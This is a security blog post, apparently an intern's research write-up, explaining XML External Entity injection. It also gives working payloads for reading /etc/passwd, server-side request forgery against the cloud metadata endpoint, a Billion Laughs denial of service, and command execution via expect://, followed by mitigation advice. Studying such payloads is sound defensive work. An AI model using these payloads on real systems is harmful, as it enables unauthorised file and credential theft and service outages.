Research on XML eXternal Entity Injection (XXE)

Prajit Sindhkar
5 min readJan 8, 2022

Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly given some interesting tasks, In my tenth task I was given to research about XML External Entity Injection(XXE), which is one of my favorite vulnerability.

What is XXE?

An XML External Entity (XXE) attack (sometimes called an XXE injection attack) is a type of attack that abuses a widely available but rarely used feature of XML parsers.

You can use XML for much more than declaring elements, attributes, and text. XML documents can be of a specific type. You declare this type in the document by specifying the type definition.

The XML parser validates if the XML document adheres to this type definition before it processes the document. You can use two types of type definitions: an XML Schema Definition (XSD) or a Document Type Definition (DTD).

XXE vulnerabilities occur in Document Type Definitions. DTDs may be considered legacy but they are still commonly used. They are derived from SGML (the ancestor of XML).

In the DTDs, we define some elements. A DTD element declaration consists of a tag name and a definition in parentheses.

What are Entities?

An entity is a piece of XML code that can be used and reused, again and again in a document by referencing it. It’s a sort of symbolic representation of information.

Entities can be used to substitute bits of information, difficult to type characters or to include a complete document.

Entities must be first declared in a DTD, before they can be used or referenced.

Entities can be referred to in a XML document by the following format.

There are basically three types of entities:

1) Internal Entity: This type of entities are defined within local DTD and can be used anywhere in the XML Document. It is basically like a replacement.

Eg: <!ENTITY foo “InternalEntity”>

2) External Entity: This type of entities are defined outside of local DTD and can be used anywhere in the XML document. It is like fetching a resource from an external area and printing it wherever it is referenced. There are two types of external entity.

->Private: These are identified by the keyword SYSTEM and are intended to use by single author.

Eg: <!ENTITY foo SYSTEM “URI/resource”>

->Public: These are identified by the keyword PUBLIC and are intended for broader use.

Eg: <!ENTITY foo PUBLIC “public_id” “URI/resource”>

3)Parameter Entities: This type of entities can be used only inside DTD and % symbol is used to represent it.

Eg: <!ENTITY % foo “entity_value”>

In finding XXE vulnerabilities we will focus more on external entities.

Why XXE Occurs?

XXE occurs due to the ability of XXE parser to retrieve any information suggested from the whole internet.

For this external entities can be used, which can be used to call both private information as well as public information over the internet as shown above.

Types of Attacks via XXE?

1. LFI via XXE: An attacker can create make the following request using a URI (known in XML as the system identifier). If the XML parser is configured to process external entities (by default, many popular XML parsers are configured to do so), the web server will return the contents of a file on the system, potentially containing sensitive data.

Payload:

<?xml version=”1.0"?>

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM “file:///etc/passwd”>]>

<foo>&xxe;</foo>

Working:

LFI via XXE

2. SSRF via XXE: Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform server-side request forgery (SSRF). This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access.

Payload:

<?xml version=”1.0"?>

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM “https://<burplink>”>]>

<foo>&xxe;</foo>

Working:

If after putting up the above payload you get HTTP request in burp collaborator then it is vulnerable to SSRF, the you can increase the impact by meta-data reading by following payload:

<?xml version=”1.0"?>

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM “http://169.254.169.254/latest/meta-data/">]>

<foo>&xxe;</foo>

3. DoS via XXE: It may seem harmless, but an attacker can use XML entities to cause a denial of service by embedding entities within entities within entities. This attack is commonly referred to as the Billion Laughs attack. It overloads the memory of the XML parser. Some XML parsers automatically limit the amount of memory they can use.

Payload:

<?xml version=”1.0"?>

<!DOCTYPE lolz [

<!ENTITY lol “lol”>

<!ELEMENT lolz (#PCDATA)>

<!ENTITY lol1 “&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;”>

<!ENTITY lol2"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;”>

<!ENTITY lol3 “&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;”>

<!ENTITY lol4 “&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;”>

<!ENTITY lol5 “&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;”>

<!ENTITY lol6 “&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;”>

<!ENTITY lol7 “&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;”>

<!ENTITY lol8 “&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;”>

<!ENTITY lol9 “&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;”> ]>

<lolz>&lol9;</lolz>

Working:

DoS via XXE

4. RCE via XXE: In some cases XXE can be escalated to RCE, but is rare. In this case if a php plugin called expect is installed on the server side it will help us in causing RCE, as it will help in executing server commands.

Payload:

<?xml version=”1.0"?>

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM “expect://whoami”>]>

<foo>&xxe;</foo>

Types of XXE:

There are basically two types of XXE:

1. In-band XXE: When the XXE attack receives the results in the same band, it is called In-Band XXE. In-Band XXE is easy to exploit and an attacker can retrieve the server’s internal files or executes commands on the server’s shell.

2. Out of Band XXE: When an attacker can’t receive the results in the same band or channel, he tries to retrieve the desired information via some other channel. If an attacker can get the information via some other band or channel, this is called Out of Band XXE.

How to mitigate XXE?

Virtually all XXE vulnerabilities arise because the application’s XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.

Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.

The easiest and safest way to prevent XXE attacks it to completely disable Document Type Definitions (DTDs).

This is all for today’s writeup.

Thanks For Reading 😊

References:

https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/

https://portswigger.net/web-security/xxe

https://www.neuralegion.com/blog/xml-external-entity-xxe-injection/#types-of-xxe-attacks

https://niravgadhiya.blogspot.com/2020/03/out-of-band-xml-external-entity-xxe.html

https://niravgadhiya.blogspot.com/2020/03/in-band-xml-external-entity-xxe.html

Profile Links:

Twitter: https://twitter.com/SAPT01

LinkedIn: https://www.linkedin.com/in/prajit-sindhkar-3563b71a6/

Instagram: https://instagram.com/prajit_01?utm_medium=copy_link

BUG XS Official Website: https://www.bugxs.co/

--

--

Prajit Sindhkar

I am a India Based Security Researcher, Bugcrowd Top 500 Hacker and Bug Bounty Leader of the BUGXS Community